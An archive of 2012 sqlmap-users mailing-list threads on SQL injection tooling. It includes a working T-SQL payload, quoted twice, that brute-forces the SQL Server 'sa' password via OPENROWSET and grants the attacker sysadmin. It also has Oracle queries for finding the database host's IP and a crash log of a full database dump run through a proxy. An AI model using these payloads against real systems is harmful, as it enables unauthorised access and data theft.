If the sa password is incorrect, the error message should be along the
lines of:

Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'sa'.

If the sa password is correct, then you'll get the appropriate delay and
probably a 200 response (though not necessarily, but you'll definitely get
the delay).

I'm guessing that your error message is something to do with user
permissions for the DBMS, a quick Google seemed to suggest that, but I'm
confident it has little to do with openrowset being disabled or an
incorrect sa password.  I assume you have mixed mode authentication in
place on SQL Server?

You can check if openrowset is enabled using sp_configure, see the
following link for more information:
http://social.msdn.microsoft.com/Forums/en/transactsql/thread/c3d3295b-933b-4ee8-934c-87c8d6a47260

Sorry to talk about a different SQL injection tool on this list.  I would
add that it'd be good to see some of the bits of SQLNinja functionality
that are missing from SQLMap implemented in the future if it's not already
planned (not that there's a lot of missing functionality).

Cheers

Chris

On 24 July 2012 14:26, juan molina <j.m...@gm...> wrote:

> I was trying sqlninja.
>
> this is the query it use for bruteforce SA password with 1 character
> (numbers and letters).
>
> declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q
> nvarchar (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789'
> while @a<37 begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set
> @z='''''' set @p=@p+@z set @q=N'select 1 from
> OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select
> 1;exec master.dbo.sp_addsrvrolemember
> '''''+system_user+N''''',''''sysadmin'''' '')' exec
> master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1
>
> but I am receiving this error:
>
>
> *Could not find stored procedure 'master.dbo.xp_execresultset'.*
>
> it was in the HTTP response. this error is because the "openrowset" is
> disable? or is just that the "SA" password is not the correct. (like
> "password wrong" error).
>
> there is any way to check if "openrowset" is enable?
>
>
> thanks.
>
>
>
> On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G. <
> ber...@gm...> wrote:
>
>> Hi Juan,
>>
>> Microsoft SQL Server has a built-in function called OPENROWSET to
>> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley
>> released a paper demonstrating how to abuse this function to perform a
>> DBMS user's password brute-force attack within the MSSQL instance. A
>> few years later the attack has been automated in sqlninja[1].
>> We have an issue open on GitHub[2] to implement the same DBA password
>> brute-force attack. We have the required code in place, see issue
>> #34[3] and will soon close the whole thing.
>>
>> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL
>> 2005 RTM it is disabled by thereforce, hence either the database
>> administrator has manually enabled it, or you won't be able to abuse
>> this function to brute-force the 'sa' (DBA) password hash or run
>> statements on his behalf.
>>
>> [1] http://sqlninja.sourceforge.net
>> [2] https://github.com/sqlmapproject/sqlmap/issues/31
>> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>>
>> Regards,
>> Bernardo
>>
>>
>> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:
>> > there is a way for bruteforce the SA password using SQL INJECTION?
>> >
>> > this is the Scenario. it is a DataBase Server (Sql Server 2008) without
>> > access to the internet (it has the 1433 port blocked),
>> > the current user is a normal user (low privileges User). cannot get SA
>> hash
>> > password.
>> >
>> > the question is, is there any tool or code or way to bruteforce the SA
>> > password? without direct access to the Sql Server?
>> >
>> > It is a request for add this functionality to SQLMAP, I don't know if is
>> > possible.
>> >
>> > Thanks.
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Live Security Virtual Conference
>> > Exclusive live event will cover all the ways today's security and
>> > threat landscape has changed and how IT managers can respond.
>> Discussions
>> > will include endpoint security, mobile security and the latest in
>> malware
>> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>>
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

Re: [sqlmap-users] Injection into columns list

[Miroslav S. <mir...@gm...>]

Hi Troy.

More info is required for sure.

You mean that you just need a (SELECT...)/subquery type of injection? This
is something that we are aware that we need to do.

Kind regards,
Miroslav Stampar
On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> wrote:

> Evening all,
>
> I had an SQL injection into a MySQL5-based web application the other week
> which involved me having control over the column list being selected.  I
> tried sqlmap against the URL, but it didn't find the injection point.  I
> tried again,  taking the --level and --risk a little higher, but still
> nothing.
>
> In the end, I manually exploited it using a sub-select. Was I doing
> something wrong with sqlmap, or will it not identify injection points like
> that?  I can provide an example of the query the application was using if
> this helps.
>
> Regards,
>
> Matt
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] Injection into columns list

[Troy B <pow...@gm...>]

Evening all,

I had an SQL injection into a MySQL5-based web application the other week
which involved me having control over the column list being selected.  I
tried sqlmap against the URL, but it didn't find the injection point.  I
tried again,  taking the --level and --risk a little higher, but still
nothing.

In the end, I manually exploited it using a sub-select. Was I doing
something wrong with sqlmap, or will it not identify injection points like
that?  I can provide an example of the query the application was using if
this helps.

Regards,

Matt

Re: [sqlmap-users] bruteforce SA password using SQL INJECTION

[juan m. <j.m...@gm...>]

I was trying sqlninja.

this is the query it use for bruteforce SA password with 1 character
(numbers and letters).

declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q
nvarchar (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789'
while @a<37 begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set
@z='''''' set @p=@p+@z set @q=N'select 1 from
OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select
1;exec master.dbo.sp_addsrvrolemember
'''''+system_user+N''''',''''sysadmin'''' '')' exec
master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1

but I am receiving this error:


*Could not find stored procedure 'master.dbo.xp_execresultset'.*

it was in the HTTP response. this error is because the "openrowset" is
disable? or is just that the "SA" password is not the correct. (like
"password wrong" error).

there is any way to check if "openrowset" is enable?


thanks.



On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G. <
ber...@gm...> wrote:

> Hi Juan,
>
> Microsoft SQL Server has a built-in function called OPENROWSET to
> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley
> released a paper demonstrating how to abuse this function to perform a
> DBMS user's password brute-force attack within the MSSQL instance. A
> few years later the attack has been automated in sqlninja[1].
> We have an issue open on GitHub[2] to implement the same DBA password
> brute-force attack. We have the required code in place, see issue
> #34[3] and will soon close the whole thing.
>
> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL
> 2005 RTM it is disabled by thereforce, hence either the database
> administrator has manually enabled it, or you won't be able to abuse
> this function to brute-force the 'sa' (DBA) password hash or run
> statements on his behalf.
>
> [1] http://sqlninja.sourceforge.net
> [2] https://github.com/sqlmapproject/sqlmap/issues/31
> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>
> Regards,
> Bernardo
>
>
> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:
> > there is a way for bruteforce the SA password using SQL INJECTION?
> >
> > this is the Scenario. it is a DataBase Server (Sql Server 2008) without
> > access to the internet (it has the 1433 port blocked),
> > the current user is a normal user (low privileges User). cannot get SA
> hash
> > password.
> >
> > the question is, is there any tool or code or way to bruteforce the SA
> > password? without direct access to the Sql Server?
> >
> > It is a request for add this functionality to SQLMAP, I don't know if is
> > possible.
> >
> > Thanks.
> >
> >
> ------------------------------------------------------------------------------
> > Live Security Virtual Conference
> > Exclusive live event will cover all the ways today's security and
> > threat landscape has changed and how IT managers can respond. Discussions
> > will include endpoint security, mobile security and the latest in malware
> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
>

Re: [sqlmap-users] Getting Database IP Address (Oracle)

[Zaki A. <zak...@gm...>]

On Mon, Jul 16, 2012 at 11:20 PM, Bernardo Damele A. G.
<ber...@gm...> wrote:

> Zaki,
>
> Recently we added switch --hostname to retrieve the database server
> hostname. There's no built-in switch to retrieve the IP yet.

Hi Bernardo,

Actually Miroslav had answered my question:

<quote>
Hi Zaki.

You can try either [1][2]:
1) --sql-query="SELECT UTL_INADDR.GET_HOST_ADDRESS() FROM DUAL"
or
2) --sql-query="SELECT SYS_CONTEXT('USERENV', 'IP_ADDRESS', 15) FROM DUAL"

...but don't hope too much because of execute privileges [3]

Also, try to use those with --parse-errors to possibly catch some DBMS
error information

Kind regards,
Miroslav Stampar

References:
[1] http://www.dba-oracle.com/t_get_ip_address_utl_inaddr_sys_context.htm
[2] http://docs.oracle.com/cd/B19306_01/appdev.102/b14258/u_inaddr.htm
[3] https://forums.oracle.com/forums/thread.jspa?messageID=9755122

</quote>

Did --hostname option had implement those sql-query?

Regards,
-- 
Zaki Akhmad

Re: [sqlmap-users] sqlmap error

[Bernardo D. A. G. <ber...@gm...>]

Dusan,

you are running a year and a half outdated version of sqlmap.
Run the following command:

$ git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

and try your run again from sqlmap-dev directory.

Bernardo


On 22 July 2012 20:52, Dusan Lauko <dus...@gm...> wrote:
> [20:02:09] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run
> with the
>   latest development version from the Subversion repository. If the
> exception per
> sists, please send by e-mail to sql...@li... the
> following
>   text and any information required to reproduce the bug. The developers
> will try
>   to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 0.9 (r3630)
> Python version: 2.7.2
> Operating system: nt
> Command line: D:\Anon Hacking\Black Hat\SQLi\SQLmap\SQLmap\sqlmap.py
> --proxy=htt
> p://186.215.202.163:8080 -u
> ****************************************************
> ***************** --random-agent --dump-all --exclude-sysdb --eta
> Technique: ERROR
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>    File "D:\Anon Hacking\Black Hat\SQLi\SQLmap\SQLmap\sqlmap.py", line
> 82, in mai
> n
>      start()
>    File "D:\Anon Hacking\Black
> Hat\SQLi\SQLmap\SQLmap\lib\controller\controller.p
> y", line 447, in start
>      action()
>    File "D:\Anon Hacking\Black
> Hat\SQLi\SQLmap\SQLmap\lib\controller\action.py",
> line 106, in action
>      conf.dbmsHandler.dumpAll()
>    File "D:\Anon Hacking\Black
> Hat\SQLi\SQLmap\SQLmap\plugins\generic\enumeration
> .py", line 1496, in dumpAll
>      data = self.dumpTable()
>    File "D:\Anon Hacking\Black
> Hat\SQLi\SQLmap\SQLmap\plugins\generic\enumeration
> .py", line 1275, in dumpTable
>      colString = ", ".join(column for column in colList)
> TypeError: sequence item 1: expected string or Unicode, NoneType found
>
> [*] shutting down at: 20:02:09
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)